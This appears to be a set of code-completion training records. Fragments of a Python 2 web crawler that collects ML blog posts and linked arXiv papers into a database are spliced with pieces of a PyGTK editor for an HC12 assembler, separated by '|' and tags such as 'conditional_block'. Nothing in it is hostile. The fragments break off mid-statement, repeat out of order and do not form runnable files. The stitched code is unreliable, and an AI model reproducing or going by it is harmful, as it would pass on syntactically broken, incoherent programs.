default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main() | chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox') | random_line_split |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+" | s.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| \t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tb | conditional_block |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def | aller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
